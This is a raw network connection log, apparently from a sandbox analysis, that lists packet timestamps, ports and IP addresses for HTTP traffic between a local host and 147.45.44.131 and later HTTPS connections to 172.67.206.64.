                                                                        Dec 12, 2024 07:52:09.835216999 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.835251093 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.835252047 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.835303068 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.836146116 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.836182117 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.836246014 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.837028980 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.837065935 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.837112904 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.837675095 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.838057995 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.838100910 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.842438936 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.842668056 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.842741013 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.847217083 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.847467899 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.847527981 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.852019072 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.852196932 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.852262974 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.856755972 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.856991053 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.857060909 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.861550093 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.861778021 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.861840010 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.866353989 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.866575956 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.866656065 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.871083021 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.871300936 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.871371031 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.876035929 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.876234055 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.876302004 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.880635023 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.880824089 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.880892038 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.885371923 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.885616064 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.885679960 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.941680908 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.941915035 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.941998005 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.944067001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.944262028 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.944366932 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.948898077 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.949039936 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.949109077 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.954530001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.954566956 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.954636097 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.958991051 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.959027052 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.959110975 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.963285923 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.963434935 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.963505030 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.987901926 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988094091 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988110065 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988245964 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.988761902 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988776922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.988816023 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.989492893 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.989509106 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.989535093 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.990274906 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.990289927 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.990319014 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:09.990925074 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:09.990972996 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.061031103 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.061197996 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.061269045 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.063246012 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.063429117 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.063503027 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.068048954 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.068242073 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.068310022 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.072849035 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.073014975 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.073077917 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.077586889 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.077815056 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.077878952 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.082375050 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.082552910 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.082607031 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.087150097 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.087357998 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.087414026 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.092067957 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.092164993 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.092231989 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.096695900 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.096956015 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.097022057 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.101582050 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.101768017 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.101851940 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.106321096 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.106498957 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.106658936 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.111021042 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.111212969 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.111798048 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.115825891 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.116012096 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.116131067 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.120599031 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.120809078 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.120887041 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.125386000 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.125612974 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.125680923 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.130294085 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.130363941 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.130522966 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.135065079 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.135241032 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.135314941 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.139678001 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.139857054 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.142528057 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.144493103 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.144690990 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.144984961 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.149255037 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.149447918 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.149502993 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.154036999 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.154195070 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.154256105 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.158791065 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.159004927 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.159318924 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.163542032 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.163728952 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.163927078 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.168384075 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.168546915 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.168612003 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.173116922 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.173300982 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.173360109 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.177963972 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.178134918 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.178237915 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.182702065 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.182826042 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.182885885 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.187488079 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.187674046 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.187740088 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.192255020 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.192420006 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.192503929 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.197050095 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.197221041 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.197285891 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.201752901 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.201951981 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.202013016 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.206506014 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.206702948 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.206912994 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.209865093 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.210092068 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.210148096 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.213090897 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.213314056 CET8049734147.45.44.131192.168.2.4
                                                                        Dec 12, 2024 07:52:10.213458061 CET4973480192.168.2.4147.45.44.131
                                                                        Dec 12, 2024 07:52:10.216371059 CET8049734147.45.44.131192.168.2.4
Timestamp                            Source Port  Dest Port  Source IP      Dest IP
Dec 12, 2024 07:52:10.216537952 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.216645002 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.219646931 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.219849110 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.219929934 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.222939968 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.223136902 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.223196983 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.226177931 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.226370096 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.226480007 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.229506969 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.229691982 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.230525970 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.232705116 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.232877016 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.233021975 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.235881090 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.236164093 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.237802029 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.238991022 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.239187002 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.239247084 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.242049932 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.242213964 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.242281914 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.244975090 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.245174885 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.245232105 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.248023033 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.248231888 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.248301029 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.251373053 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.251724005 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.251787901 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.253927946 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.254220963 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.254285097 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.258097887 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.258142948 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.258198023 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.259840965 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.260034084 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.260260105 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.262821913 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.263000011 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.263066053 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.265790939 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.265970945 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.266524076 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.269000053 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.269182920 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.269253969 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.271727085 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.271918058 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.271975994 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.274630070 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.274832964 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.274890900 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.277573109 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.277787924 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.278172016 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.280354977 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.280550957 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.280631065 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.283191919 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.283351898 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.283406973 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.285917997 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.286113977 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.286525965 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.288654089 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.288847923 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.289697886 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.291424990 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.291593075 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.291842937 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.294069052 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.294264078 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.294549942 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.296761990 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.296902895 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.297246933 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.299381018 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.299586058 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.299645901 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.301979065 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.302139044 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.302212000 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.304563999 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.304801941 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.304858923 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.307132006 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.307290077 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.307451010 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.309833050 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.309973001 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.310391903 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.312252045 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.312427044 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.312526941 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.314981937 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.315094948 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.315160036 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.317260027 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.317445993 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.317572117 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.318948984 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.319125891 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.319538116 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.320641994 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.320903063 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.320965052 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.322177887 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.322396994 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.322530985 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.323914051 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.324103117 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.324219942 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.325526953 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.325680017 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.325728893 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.327254057 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.327388048 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.327514887 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.328792095 CET  80           49734      147.45.44.131  192.168.2.4
Dec 12, 2024 07:52:10.368987083 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:10.972203016 CET  49734        80         192.168.2.4    147.45.44.131
Dec 12, 2024 07:52:12.300673962 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:12.300765991 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:12.300852060 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:12.304157972 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:12.304181099 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:13.534568071 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:13.534646034 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:13.537134886 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:13.537147045 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:13.537544966 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:13.579935074 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:13.579983950 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:13.580153942 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:14.256705046 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:14.256968975 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:14.257114887 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:14.258313894 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:14.258351088 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:14.258366108 CET  49737        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:14.258371115 CET  443          49737      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:14.839428902 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:14.839530945 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:14.839612007 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:14.840392113 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:14.840420008 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.055068970 CET  443          49738      172.67.206.64  192.168.2.4
Dec 12, 2024 07:52:16.055149078 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.056971073 CET  49738        443        192.168.2.4    172.67.206.64
Dec 12, 2024 07:52:16.056993008 CET  443          49738      172.67.206.64  192.168.2.4
